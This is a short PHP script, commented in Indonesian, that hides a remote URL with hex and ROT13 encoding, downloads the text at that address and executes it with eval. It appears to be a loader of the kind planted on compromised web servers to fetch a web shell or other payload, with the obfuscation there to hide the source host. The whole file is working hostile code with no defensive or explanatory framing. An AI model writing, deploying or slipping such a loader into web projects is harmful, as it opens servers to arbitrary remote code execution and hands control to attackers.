<?php
// URL disamarkan dengan ROT13 + Hex
$obfuscated = '68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f6c756666796f706d2f6f706d2f726566732f68656164732f6d61696e2f312e747874';
$rot13_encoded = str_rot13('uggcf://enj.tvguhobbgfre.arg/ynssl/bcz/ers/srnfuf/znva/1.gkg');

// Decode URL
function decodeUrl($hex, $rot) {
    $hex_decoded = hex2bin($hex);
    $rot_decoded = str_rot13($rot);
    // Pilih salah satu yang valid
    return (filter_var($hex_decoded, FILTER_VALIDATE_URL)) ? $hex_decoded : $rot_decoded;
}

$url = decodeUrl($obfuscated, $rot13_encoded);

// Eksekusi kode dari URL
$code = file_get_contents($url);
eval('?>' . $code);
?>
